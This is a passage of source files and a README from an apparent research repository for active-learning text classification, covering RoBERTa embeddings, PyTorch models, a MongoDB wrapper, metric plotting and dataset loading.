self.reverse_mapper = {index: value for index, value in enumerate(set(labels))}\n self.fitted = True\n\n def transform_instances(self, data: List[Dict[str, Any]]) -> List[List[torch.Tensor]]:\n transformed_data = [_transform_text(sample) for sample in data]\n with torch.no_grad():\n transformed_instances = [\n [torch.from_numpy(tensor) for tensor in self.transform(text)]\n for text in tqdm(transformed_data)\n ]\n return transformed_instances\n\n def transform_labels(self, data: List[str]) -> List[int]:\n return [self.transform_label(sample) for sample in tqdm(data)]\n\n def reset(self) -> None:\n self.fitted = False\n\n\n\"\"\" \nwget https://dl.fbaipublicfiles.com/fairseq/models/roberta.base.tar.gz\ntar -xzvf roberta.base.tar.gz\n\"\"\"\n\n\nclass RoBERTaWordEmbeddings(Transformator):\n def __init__(self):\n super().__init__(embedding_dim=768)\n\n self.roberta = RobertaModel.from_pretrained(\"roberta.base\").to(DEVICE)\n self.fitted: bool = False\n\n def transform(self, text: str) -> List[torch.Tensor]:\n return [\n _sentence_embed(\n self.roberta.extract_features(self.roberta.encode(sentence)).squeeze(0),\n )\n for sentence in self.split_sentences(text)\n ]\n\n def fit(self, labels: List[str]) -> None:\n if self.fitted is False:\n print(\"RoBERTa encoder is encoding on-prem...\")\n 
print(\"creating labels encoding hash map...\")\n self.encoding_mapper = {value: index for index, value in enumerate(set(labels))}\n self.reverse_mapper = {index: value for index, value in enumerate(set(labels))}\n self.fitted = True\n\n def transform_instances(self, text_documents: List[Dict[str, Any]]) -> List[List[torch.Tensor]]:\n transformed_data = [_transform_text(text_document) for text_document in text_documents]\n with torch.no_grad():\n transformed_instances = [self.transform(text) for text in tqdm(transformed_data)]\n return transformed_instances\n\n def transform_labels(self, data: List[str]) -> List[int]:\n return [self.transform_label(sample) for sample in tqdm(data)]\n\n def reset(self) -> None:\n self.fitted = False\n\n @staticmethod\n def split_sentences(text: str) -> List[str]:\n splitted_sentences: List[str] = []\n for sentence in sent_tokenize(text if isinstance(text,str) else \"empty\"):\n if len(sentence) > 512:\n n_splits = len(sentence) // 512\n # not the best solution but should work...\n splitted_sentences += [sentence[i * 512 : (i + 1) * 512] for i in range(n_splits)]\n splitted_sentences.append(sentence[512 * n_splits :])\n else:\n splitted_sentences.append(sentence)\n return splitted_sentences\n\n\n#################################\n### Additional public methods ###\n#################################\n\n\ndef _mean_agg(embeddings: Union[torch.Tensor, List[torch.Tensor]]) -> torch.Tensor:\n if isinstance(embeddings, list):\n return torch.mean(torch.stack(embeddings, dim=0), dim=0)\n return torch.mean(embeddings, dim=0)\n\n\ndef _sentence_embed(\n embeddings: Union[torch.Tensor, List[torch.Tensor]],\n aggregator: Callable[[Union[torch.Tensor, List[torch.Tensor]]], torch.Tensor] = _mean_agg,\n) -> torch.Tensor:\n return aggregator(embeddings)\n\n\ndef _normalize(embedding: Union[np.ndarray, List[float]], dim: int) -> np.ndarray:\n epsilon = 0.1\n norm = np.linalg.norm(np.asarray(embedding))\n if norm <= epsilon:\n return np.asarray([0.0 for i in range(dim)])\n else:\n return np.asarray(embedding) / norm\n\n\ndef _transform_text(sample: Dict[str, Any]) -> str:\n\n # text = \" \".join(\n # [sample[\"record\"][\"text\"][\"title\"], sample[\"record\"][\"text\"][\"body\"]]\n # )\n # return text\n return sample[\"record\"][\"text\"][\"body\"]\n"
},
{
"alpha_fraction": 0.5799130797386169,
"alphanum_fraction": 0.5866730809211731,
"avg_line_length": 29.01449203491211,
"blob_id": "f751c3a75ba01492e1c118be6ad25d726399f220",
"content_id": "b2f9d70ee5e7d154c0dd9a4b27015d42c4e505cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2071,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 69,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/neural_nets_architecture.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\n\nfrom typing import Tuple\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n\n\nclass NeuralNetLSTM(nn.Module):\n def __init__(\n self,\n input_dim: int,\n hidden_dim: int,\n output_dim: int,\n dropout: float = 0,\n num_of_lstm_layers: int = 1,\n ):\n super(NeuralNetLSTM, self).__init__()\n\n self.lstm = nn.LSTM(\n input_dim,\n hidden_dim,\n batch_first=True,\n bidirectional=True,\n num_layers=num_of_lstm_layers,\n dropout=0,\n )\n self.linear1 = nn.Linear(hidden_dim * 2, output_dim)\n self.relu = nn.PReLU()\n self.dropout = nn.Dropout(0.1)\n self.softmax = nn.Softmax(dim=1)\n\n def forward(self, inputs):\n\n embeddings, seq_lengths, _ = inputs\n\n total_length = embeddings.size(1)\n packed_inputs = pack_padded_sequence(embeddings, seq_lengths, batch_first=True)\n unpacked_lstm_out, _ = pad_packed_sequence(\n self.lstm(packed_inputs)[0], batch_first=True, total_length=total_length\n )\n lstm_mean = torch.mean(unpacked_lstm_out, 1)\n lstm_out = self.dropout(self.relu(lstm_mean))\n\n return self.dropout(self.softmax(self.linear1(lstm_out)))\n\n def predict(self, inputs):\n _, _, sorted_indices = inputs\n return self.forward(inputs)[sorted_indices]\n\n\nclass NeuralNet(nn.Module):\n def __init__(self, input_size: int, hidden_size: int, num_classes: int, dropout=0):\n super(NeuralNet, self).__init__()\n self.hidden = nn.Linear(input_size, hidden_size)\n self.output = nn.Linear(hidden_size, num_classes)\n self.sigmoid = nn.Sigmoid()\n self.softmax = nn.Softmax(dim=1)\n self.dropout = nn.Dropout(inplace=False)\n\n def forward(self, x):\n x = self.hidden(x)\n x = self.dropout(x)\n x = self.sigmoid(x)\n x = self.output(x)\n x = self.softmax(x)\n return x\n\n def predict(self, x):\n return self.forward(x)\n"
},
{
"alpha_fraction": 0.5105224847793579,
"alphanum_fraction": 0.5322932004928589,
"avg_line_length": 26.8383846282959,
"blob_id": "7c5a6fe18f6f744a0072b6c51d4f3351e5bd7fa9",
"content_id": "01b6e8bdfa9f35f1eee2d3437d89404b4cdae0df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5512,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 198,
"path": "/Peony_project/Peony_visualization/src/active_learning_for_text_classification/data_agg_for_article.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\n\nfrom PeonyPackage.PeonyDb import MongoDb\n\nfrom typing import Dict\n\ndev_func = np.std\nmean_func = np.mean\napi = MongoDb()\n\n\ndef create_table_str(res):\n return f\"{round(mean_func(res, axis=0)[-1][0],3)}$\\pm${round(dev_func(res, axis=0)[-1][0],3)}\"\n\n\ndef create_evolution_row(res):\n return [\n f\"{round(mean_func(res, axis=0)[0][0],3)}$\\pm${round(dev_func(res, axis=0)[0][0],3)}\",\n f\"{round(mean_func(res, axis=0)[49][0],3)}$\\pm${round(dev_func(res, axis=0)[49][0],3)}\",\n f\"{round(mean_func(res, axis=0)[99][0],3)}$\\pm${round(dev_func(res, axis=0)[99][0],3)}\",\n f\"{round(mean_func(res, axis=0)[149][0],3)}$\\pm${round(dev_func(res, axis=0)[149][0],3)}\",\n f\"{round(mean_func(res, axis=0)[199][0],3)}$\\pm${round(dev_func(res, axis=0)[199][0],3)}\",\n ]\n\n\ndef get_res_from_db(alg, acsq_func, category):\n return api.get_model_results(\n {\"model\": alg, \"acquisition_function\": acsq_func, \"category_1\": category,}\n )[0][\"results\"]\n\n\ndef create_non_nn_table():\n category = \"SPORTS\"\n\n # Random\n svm_tfidf_ran = api.get_model_results(\n {\"model\": \"svm\", \"acquisition_function\": \"random\", \"category_1\": category}\n )[0][\"results\"]\n svm_fasttext_ran = api.get_model_results(\n {\n \"model\": \"svm_fast_text_embeddings\",\n \"acquisition_function\": \"random\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n rf_tfidf_ran = api.get_model_results(\n {\n \"model\": \"random_forest\",\n \"acquisition_function\": \"random\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n rf_fasttext_ran = api.get_model_results(\n {\n \"model\": \"random_forest_fast_text_embeddings\",\n \"acquisition_function\": \"random\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n # Entropy\n svm_tfidf_ent = api.get_model_results(\n {\"model\": \"svm\", \"acquisition_function\": \"entropy\", \"category_1\": category}\n )[0][\"results\"]\n svm_fasttext_ent = api.get_model_results(\n {\n \"model\": \"svm_fast_text_embeddings\",\n \"acquisition_function\": \"entropy\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n rf_tfidf_ent = api.get_model_results(\n {\n \"model\": \"random_forest\",\n \"acquisition_function\": \"entropy\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n rf_fasttext_ent = api.get_model_results(\n {\n \"model\": \"random_forest_fast_text_embeddings\",\n \"acquisition_function\": \"entropy\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n\n res = [\n [\n create_table_str(svm_tfidf_ran),\n create_table_str(svm_tfidf_ent),\n create_table_str(svm_fasttext_ran),\n create_table_str(svm_fasttext_ent),\n ],\n [\n create_table_str(rf_tfidf_ran),\n create_table_str(rf_tfidf_ent),\n create_table_str(rf_fasttext_ran),\n create_table_str(rf_fasttext_ent),\n ],\n ]\n\n df = pd.DataFrame(res)\n df.columns = [\n \"TF-INF Random\",\n \"TF-INF Entropy\",\n \"Fast Text Random\",\n \"Fast Text Entopy\",\n ]\n df[\"Algorithms\"] = [\"SVM\", \"Random Forest\"]\n\n return df.set_index(\"Algorithms\")\n\n\ndef create_nn_table():\n categories = [\n \"CRIME\",\n \"SPORTS\",\n \"POLITICS\",\n \"TECH\",\n \"COLLEGE\",\n \"POSITIVE_EMOTIONS_TWEETS\",\n ]\n acq_funcs = [\"entropy\"] # \"entropy\"]\n algs = [\n \"bayesian_sgld_nn_fast_text_embeddings\",\n \"bayesian_denfi_nn_hot_start_fast_text_embeddings\",\n \"bayesian_denfi_v_2_0.3_fast_text_embeddings\",\n \"bayesian_dropout_nn_fast_text_embeddings\",\n \"bayesian_dropout_nn_hot_start_fast_text_embeddings\",\n 
\"bayesian_dropout_hot_start_w_noise_0.3_fast_text_embeddings\",\n ]\n dev_func = np.std\n mean_func = np.mean\n\n list_w_results = [\n [\n create_table_str(get_res_from_db(alg, acq_func, category))\n for category in categories\n for acq_func in acq_funcs\n ]\n for alg in algs\n ]\n\n df = pd.DataFrame(list_w_results)\n df.columns = [\n # \"CRIME Random\",\n \"CRIME Entropy\",\n # \"SPORTS Random\",\n \"SPORTS Entopy\",\n # \"POLITICS Random\",\n \"POLITICS Entopy\",\n # \"TECH Random\",\n \"TECH Entopy\",\n # \"EDUCATION Random\",\n \"EDUCATION Entopy\",\n # TWEETS Random\n \"TWEETS Entropy\",\n ]\n\n df[\"Algorithms\"] = [\n \"SGLD\",\n \"DENFI V1\",\n \"DENFI V2\",\n \"Dropout cold start\",\n \"Dropout hot start\",\n \"Dropout hot start w noise\",\n ]\n\n return df.set_index(\"Algorithms\")\n\n\ndef create_evloution_table():\n category = \"TECH\"\n models = [0.1, 0.2, 0.3, 0.4, 0.6, 1]\n dev_func = np.std\n mean_func = np.mean\n\n list_w_results = [\n create_evolution_row(get_res_from_db(alg, \"entropy\", category))\n for alg in [\n f\"bayesian_dropout_hot_start_w_noise_{model}_fast_text_embeddings\"\n # f\"bayesian_denfi_v_2_{model}_fast_text_embeddings\"\n for model in models\n ]\n ]\n\n df = pd.DataFrame(list_w_results)\n df.columns = [\n \"0\",\n \"50\",\n \"100\",\n \"150\",\n \"200\",\n ]\n\n df[\"Noise Variance\"] = [\"0.1\", \"0.2\", \"0.3\", \"0.4\", \"0.6\", \"1\"]\n\n return df.set_index(\"Noise Variance\")\n"
},
{
"alpha_fraction": 0.5046639442443848,
"alphanum_fraction": 0.5135135054588318,
"avg_line_length": 31.9212589263916,
"blob_id": "2f3f8227f85ef3efbbe2769d6ad90bf5d1cfc6f5",
"content_id": "296afc90125ee128be08162a8977a3667331b391",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4181,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 127,
"path": "/Peony_project/PeonyPackage/PeonyDb.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import pymongo\nimport logging\nimport numpy as np\n\nfrom pathlib import Path\nfrom typing import Callable, List, Dict, Any\nfrom tqdm import tqdm\n\n\nclass MongoDb:\n def __init__(\n self,\n db_user: str = \"User\",\n db_pass: str = \"Pass\",\n db_host: str = \"127.0.0.1\",\n db_port: int = 27017,\n ):\n\n url = f\"mongodb://{db_user}:{db_pass}@{db_host}:{db_port}/Peony-MongoDb\"\n self.client = pymongo.MongoClient(url)\n self.database = self.client[\"Peony-MongoDb\"]\n\n def load_data_to_database(\n self,\n collection_name: str,\n path_to_data: Path,\n load_data: Callable[[Path], List[dict]],\n transorm_data: Callable[[Dict[str, Any]], Dict[str, Any]],\n ) -> None:\n logging.info(f\"extracting {collection_name}... \")\n ids: list = []\n data = load_data(path_to_data)\n logging.info(\"data transformation with respect to Peony database schema...\")\n transormed_data = [transorm_data(record) for record in data]\n collection = self.database[collection_name]\n logging.info(\"uploading to Peony database...\")\n for record in tqdm(transormed_data):\n ids.append(collection.insert_one(record).inserted_id)\n logging.info(\n f\"{len(ids)} records from {len(data)} were successfully uploaded...\"\n )\n\n def load_model_results(\n self,\n model: str,\n acquisition_function: str,\n algorithm_runs: int,\n learning_step: int,\n active_learning_iterations: int,\n initial_train_data_size: int,\n validation_data_size: int,\n category_1: str,\n category_2: str,\n data: List[List[float]],\n category_1_ratio: float = 0.5,\n collection_name: str = \"models_results\",\n ) -> None:\n results_dict: dict = {\n \"model\": model,\n \"acquisition_function\": acquisition_function,\n \"algorithm_runs\": algorithm_runs,\n \"learning_step\": learning_step,\n \"active_learning_iterations\": active_learning_iterations,\n \"initial_train_data_size\": initial_train_data_size,\n \"validation_data_size\": validation_data_size,\n \"category_1\": category_1,\n \"category_2\": category_2,\n \"category_1_ratio\": category_1_ratio,\n \"category_2_ratio\": 1 - (category_1_ratio),\n \"results\": data,\n }\n collection = self.database[collection_name]\n collection.insert_one(results_dict).inserted_id\n\n def get_model_results(\n self,\n filter_dict: dict,\n collection_name: str = \"models_results\",\n skip: int = 0,\n limit: int = 10000,\n ) -> List[Dict[str, Any]]:\n return list(\n self.database[collection_name].find(\n filter=filter_dict, skip=skip, limit=limit\n )\n )\n\n def get_record(\n self,\n collection_name: str,\n collection_id: int,\n label: str = None,\n hash: str = None,\n skip: int = 0,\n limit: int = 10000,\n ) -> List[Dict[str, Any]]:\n if label is not None:\n return list(\n self.database[collection_name].find(\n filter={\n \"datasetName\": collection_name,\n \"datasetId\": collection_id,\n \"record.label\": label,\n },\n skip=skip,\n limit=limit,\n )\n )\n elif hash is not None:\n return [\n self.database[collection_name].find_one(\n filter={\n \"datasetName\": collection_name,\n \"datasetId\": collection_id,\n \"record.id\": hash,\n },\n skip=skip,\n )\n ]\n else:\n return list(\n self.database[collection_name].find(\n filter={\"datasetName\": collection_name, \"datasetId\": collection_id},\n skip=skip,\n limit=limit,\n )\n )\n"
},
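A minimal usage sketch of the `MongoDb` wrapper above, assuming a local MongoDB instance with the default credentials from `__init__`; the collection name and id follow the `Tweets_emotions_dataset` module further below, and the label, model, and acquisition-function values in the queries are illustrative only.

```python
from PeonyPackage.PeonyDb import MongoDb

api = MongoDb()

# Fetch up to 100 records with a given label from one dataset collection.
records = api.get_record(
    collection_name="Tweets_emotions_dataset",
    collection_id=3,
    label=0,
    limit=100,
)

# Read back the stored experiment curves for one model/acquisition pair.
results = api.get_model_results(
    {"model": "svm", "acquisition_function": "random"}
)
```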
{
"alpha_fraction": 0.5518560409545898,
"alphanum_fraction": 0.5701332092285156,
"avg_line_length": 27.691057205200195,
"blob_id": "00dcd3c08081aceca849a55faa45a308f1427902",
"content_id": "bbfaf8aa7fdc23d0a315736c5960f159def5dde0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7058,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 246,
"path": "/Peony_project/Peony_visualization/src/active_learning_for_text_classification/peony_visualization.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom typing import List, Dict, Tuple\nfrom scipy import interp\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import (\n confusion_matrix,\n roc_curve,\n auc,\n precision_recall_curve,\n average_precision_score,\n)\n\n\ndef transform_label_to_binary(\n true_vs_predicted: List[Dict[str, np.ndarray]]\n) -> Tuple[List[Dict[str, np.ndarray]], List[int]]:\n\n unique_values = np.unique(true_vs_predicted[0][\"true\"])\n if len(unique_values) > 2:\n raise Exception(\"This is not binary classification\")\n if len(unique_values) != 2:\n mapped_to_0 = unique_values[0]\n print(f\"Label {mapped_to_0} in mapped to 0, another label is mapped to 1\")\n else:\n mapped_to_0 = unique_values[0]\n mapped_to_1 = unique_values[1]\n print(f\"Label {mapped_to_0} in mapped to 0, label {mapped_to_1} in mapped to 1\")\n for record in true_vs_predicted:\n for index in range(len(record[\"true\"])):\n record[\"true\"][index] = 0 if record[\"true\"][index] == mapped_to_0 else 1\n record[\"predicted\"][index] = (\n 0 if record[\"predicted\"][index] == mapped_to_0 else 1\n )\n\n return (true_vs_predicted, unique_values)\n\n\ndef roc_and_auc_metrics(true_vs_predicted: List[Dict[str, np.ndarray]]) -> None:\n\n tprs = []\n aucs = []\n mean_fpr = np.linspace(0, 1, 100)\n plt.figure(1)\n\n for index, record in enumerate(true_vs_predicted):\n # Compute ROC curve and area the curve\n fpr, tpr, thresholds = roc_curve(record[\"true\"], record[\"predicted\"])\n tprs.append(interp(mean_fpr, fpr, tpr))\n tprs[-1][0] = 0.0\n roc_auc = auc(fpr, tpr)\n aucs.append(roc_auc)\n plt.plot(\n fpr,\n tpr,\n lw=1,\n alpha=0.3,\n label=\"ROC fold %d (AUC = %0.2f)\" % (index + 1, roc_auc),\n )\n\n plt.plot([0, 1], [0, 1], linestyle=\"--\", lw=2, color=\"r\", label=\"Chance\", alpha=0.8)\n\n mean_tpr = np.mean(tprs, axis=0)\n mean_tpr[-1] = 1.0\n mean_auc = auc(mean_fpr, mean_tpr)\n std_auc = np.std(aucs)\n plt.plot(\n mean_fpr,\n mean_tpr,\n color=\"b\",\n label=r\"Mean ROC (AUC = %0.2f $\\pm$ %0.2f)\" % (mean_auc, std_auc),\n lw=2,\n alpha=0.8,\n )\n\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_tpr + std_tpr, 1)\n tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n plt.fill_between(\n mean_fpr,\n tprs_lower,\n tprs_upper,\n color=\"grey\",\n alpha=0.2,\n label=r\"$\\pm$ 1 std. 
dev.\",\n )\n\n plt.xlim([-0.05, 1.05])\n plt.ylim([-0.05, 1.05])\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n plt.title(\"Receiver operating characteristic example\")\n plt.legend(loc=\"lower right\")\n plt.show()\n\n\ndef get_confusion_matrix(true_vs_predicted: List[Dict[str, np.ndarray]]) -> None:\n ...\n\n\ndef plot_precision_recall_curve(true_vs_predicted: List[Dict[str, np.ndarray]]) -> None:\n\n plt.figure(2)\n\n cross_val_average_precision: List[float] = []\n cross_val_precision_recall: List[tuple] = []\n max_step_prec: int = 0\n max_step_recall: int = 0\n\n for index, record in enumerate(true_vs_predicted):\n\n average_precision = average_precision_score(record[\"true\"], record[\"predicted\"])\n cross_val_average_precision.append(average_precision)\n\n precision, recall, _ = precision_recall_curve(\n record[\"true\"], record[\"predicted\"]\n )\n cross_val_precision_recall.append((precision, recall))\n max_step_prec = (\n len(precision) if len(precision) > max_step_prec else max_step_prec\n )\n max_step_recall = (\n len(precision) if len(recall) > max_step_recall else max_step_recall\n )\n\n plt.plot(\n recall,\n precision,\n color=\"b\",\n lw=1,\n alpha=0.3,\n label=\"PR fold %d (AP = %0.2f)\" % (index + 1, average_precision),\n )\n plt.fill_between(recall, precision, color=\"b\", alpha=0.01)\n\n mean_precision = np.mean(\n [\n fold_precision[0]\n for fold_precision in cross_val_precision_recall\n if len(fold_precision[0]) == max_step_prec\n ],\n axis=0,\n )\n mean_recall = np.mean(\n [\n fold_recall[1]\n for fold_recall in cross_val_precision_recall\n if len(fold_recall[0]) == max_step_recall\n ],\n axis=0,\n )\n\n mean_average_precision = sum(cross_val_average_precision) / len(\n cross_val_average_precision\n )\n plt.plot(\n mean_recall,\n mean_precision,\n linestyle=\"--\",\n color=\"k\",\n lw=1,\n label=\"Mean PR (mean AP = %0.2f)\" % (mean_average_precision),\n )\n\n plt.xlabel(\"Recall\")\n plt.ylabel(\"Precision\")\n plt.ylim([0.0, 1.05])\n plt.xlim([0.0, 1.0])\n plt.title(\n \"Cross validation 2-class Precision-Recall curves: Mean AP={0:0.2f}\".format(\n mean_average_precision\n )\n )\n\n plt.legend(loc=\"lower left\")\n plt.show()\n\n\ndef visualize_two_auc_evolutions(\n first_auc_seq: np.ndarray, second_auc_seq: np.ndarray\n) -> None:\n\n plt.figure(3)\n\n first_mean = np.mean(first_auc_seq, axis=0)\n first_std = np.std(first_auc_seq, axis=0)\n\n second_mean = np.mean(second_auc_seq, axis=0)\n second_std = np.std(second_auc_seq, axis=0)\n\n plt.plot(\n first_mean,\n linestyle=\"-\",\n color=\"r\",\n lw=1,\n label=\"Random Selection AUC evolution mean\",\n )\n plt.plot(first_mean + first_std, linestyle=\"-\", color=\"r\", alpha=0.2)\n plt.plot(first_mean - first_std, linestyle=\"-\", color=\"r\", alpha=0.2)\n\n # plt.fill_between(\n # first_mean.tolist,\n # (first_mean + first_std).tolist(),\n # (first_mean - first_std).tolist(),\n # color=\"r\",\n # alpha=0.2,\n # label=\"1 std. dev.\",\n # )\n\n plt.plot(\n second_mean,\n linestyle=\"-\",\n color=\"g\",\n lw=1,\n label=\"Active Learning AUC evolution mean\",\n )\n plt.plot(second_mean + second_std, linestyle=\"-\", color=\"g\", alpha=0.2)\n plt.plot(second_mean - second_std, linestyle=\"-\", color=\"g\", alpha=0.2)\n\n # plt.fill_between(\n # first_mean.tolist,\n # (first_mean + first_std).tolist(),\n # (first_mean - first_std).tolist(),\n # color=\"g\",\n # alpha=0.2,\n # label=\"1 std. 
dev.\",\n # )\n\n plt.xlabel(\"Learning Iterations\")\n plt.ylabel(\"AUC metrics\")\n plt.title(\"AUC and Learning Iterations dependent on choice of new training data\")\n plt.legend(loc=\"lower left\")\n plt.show()\n\n\ndef calculate_binary_metrics(\n true_vs_predicted: List[Dict[str, np.ndarray]], label_to_binary: bool = True\n) -> None:\n\n if label_to_binary:\n true_vs_predicted, unique_values = transform_label_to_binary(true_vs_predicted)\n\n roc_and_auc_metrics(true_vs_predicted)\n plot_precision_recall_curve(true_vs_predicted)\n"
},
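A smoke-test sketch for `calculate_binary_metrics` above, using two invented cross-validation folds that are already in 0/1 form (hence `label_to_binary=False`); the import path is inferred from this record's `path` field.

```python
import numpy as np

from Peony_visualization.src.active_learning_for_text_classification.peony_visualization import (
    calculate_binary_metrics,
)

# Two synthetic folds: binary ground truth plus predicted scores in [0, 1].
true_vs_predicted = [
    {"true": np.array([1, 0, 1, 0]), "predicted": np.array([0.9, 0.6, 0.8, 0.2])},
    {"true": np.array([0, 0, 1, 1]), "predicted": np.array([0.1, 0.7, 0.9, 0.6])},
]

# Plots the per-fold and mean ROC curves, then the precision-recall curves.
calculate_binary_metrics(true_vs_predicted, label_to_binary=False)
```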
{
"alpha_fraction": 0.6657429933547974,
"alphanum_fraction": 0.6737097501754761,
"avg_line_length": 31.066667556762695,
"blob_id": "51c483c68446b067f44092c02d9ce3f74df1628c",
"content_id": "69a1eb5e52468b91c2791b6f8136ca4f4cc769e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2887,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 90,
"path": "/Peony_project/Peony_database/README.md",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "# Peony Database Architecture\n\n## Database Description \n\n\n\nIn this project we decided to work with NoSQL database. Our choice was MongoDb. The reason why we have chosen MongoDb is because of its simplicity and possibility of maintaining through Docker \n\n## Docker + MongoDb\n\nSince Doker and MongoDb is perfect combination, Peony Database can be deployed with two lines of code (Remeber to activate `peony_project` environment)\n1. Run Docker + MongoDb with `docker-compose up -d --build`\n2. Load the data with `python3 fill_in_the_database.py --huffpost <path> --newsgroups <path> --tweets <path> --comments <path> --emotions <path>`. Each parameter representes one dataset.\n200k texts from Huffpost, 20 newsgroups datatset, 1600k tweets, emotions classification.\n\n\n[Huffpost dataset](https://www.kaggle.com/rmisra/news-category-dataset/home)\n[1600k tweets dataset](https://www.kaggle.com/kazanova/sentiment140)\n[20 newsgroups dataset](https://www.kaggle.com/crawford/20-newsgroups)\n//TODO Add references to each dataset\n\n\n\n## MongoDb Data Format \n\nMongoDb represents the data in BSON format behind the scenes but we will send and get JSON format data.\n\n### Datasets and Their Instances\n\nHere is JSON schema of how the data are stored and what a user will get as an output from a database. ([Understanding of JSON schema can be found here](https://json-schema.org/understanding-json-schema/))\n\n```\n{\n\t\"title\": \"PeonyDatabase\",\n\t\"type\": \"object\",\n\t\"properties\": {\n\t\t\"datasetName\": {\n\t\t\t\"type\": \"string\",\n\t\t\t\"description\": \"Name of the dataset\"\n\t\t},\n\t\t\"datasetId\": {\n\t\t\t\"type\": \"int\",\n\t\t\t\"description\": \"Unique hash id that will be created automatically\" \n\t\t},\n\t\t\"record\": {\n\t\t\t\"type\": \"object\",\n\t\t\t\"description\": \"All information about an instance\",\n\t\t\t\"properties\": {\n\t\t\t\t\"id\": {\n\t\t\t\t\t\"type\": \"string\",\n\t\t\t\t\t\"description\": \"Unique hash id that will be created automatically\" \n\t\t\t\t},\n\t\t\t\t\"snippet\": {\n\t\t\t\t\t\t\t\"type\": \"string\",\n\t\t\t\t\t\t\t\"description\": \"Snippet of a text. Can be empty\" \n\t\t\t\t},\n\t\t\t\t\"text\": {\n\t\t\t\t\t\"type\": \"object\",\n\t\t\t\t\t\"description\": \"Text instance that is used for a model\",\n\t\t\t\t\t\"properties\" : {\n\t\t\t\t\t\t\"title\": {\n\t\t\t\t\t\t\t\"type\": \"string\",\n\t\t\t\t\t\t\t\"description\": \"Title of a text. Can be empty\"\n\t\t\t\t\t\t},\n\t\t\t\t\t\t\"body\": {\n\t\t\t\t\t\t\t\"type\": \"string\",\n\t\t\t\t\t\t\t\"description\": \"Body of a text\"\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t\"label\": {\n\t\t\t\t\t\"type\": \"string\",\n\t\t\t\t\t\"description\": \"Label for an instance. Can be empty if this is not validation data\"\n\t\t\t\t},\n\t\t\t\t\"metadata\": {\n\t\t\t\t\t\"type\": \"object\",\n\t\t\t\t\t\"description\": \"Any additional metadata. Can be empty field\"\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t},\n}\n```\n\n\n### Models\n\nIn order to use specific model from PeonyBox in future, a user can store this model model in Peony Database. \n\n//TODO Figure out how models will be stored in the database \n"
},
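A concrete record matching the schema above may clarify the layout; every value here is invented for illustration.

```python
sample_record = {
    "datasetName": "Tweets_emotions_dataset",
    "datasetId": 3,
    "record": {
        "id": "c0ffee42...",  # hash id, created automatically on upload
        "snippet": "",
        "text": {"title": "", "body": "what a lovely day"},
        "label": "4",
        "metadata": {"user": "some_user", "date": "2009-04-06"},
    },
}
```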
{
"alpha_fraction": 0.5825175046920776,
"alphanum_fraction": 0.5839160680770874,
"avg_line_length": 29.4255313873291,
"blob_id": "5d34f5204bbe80cecb3cbb912059d064b6867669",
"content_id": "bd99a2913a2be2c831faac03e16653f2739ec219",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1430,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 47,
"path": "/Peony_project/Peony_database/src/datasets/Tweets_emotions_dataset.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport logging\n\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\n\nCOLLECTION_NAME = \"Tweets_emotions_dataset\"\nCOLLECTION_ID = 3\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = COLLECTION_ID\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"id\"] = create_hash(\n [record[\"text\"], record[\"date\"], record[\"user\"]]\n )\n transormed_record[\"record\"][\"text\"] = {\"body\": record[\"text\"]}\n transormed_record[\"record\"][\"label\"] = record[\"target\"]\n transormed_record[\"record\"][\"metadata\"] = {\n \"user\": record[\"user\"],\n \"date\": record[\"date\"],\n }\n return transormed_record\n\n\ndef load_data(path: Path) -> List[dict]:\n data: list = []\n df = pd.read_csv(path, index_col=None, encoding=\"utf8\")\n for _, row in tqdm(df.iterrows()):\n try:\n record = {\n \"target\": row[\"target\"],\n \"text\": row[\"text\"],\n \"date\": row[\"date\"],\n \"user\": row[\"user\"],\n }\n data.append(record)\n except KeyError:\n logging.warning(\n \"Some fields are missing. This record was removed from dataset\"\n )\n return data\n"
},
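A minimal sketch of how this loader plugs into `MongoDb.load_data_to_database` from `PeonyDb.py` above; the CSV path is a placeholder, and `transorm_data` keeps the module's own spelling.

```python
from pathlib import Path

from PeonyPackage.PeonyDb import MongoDb
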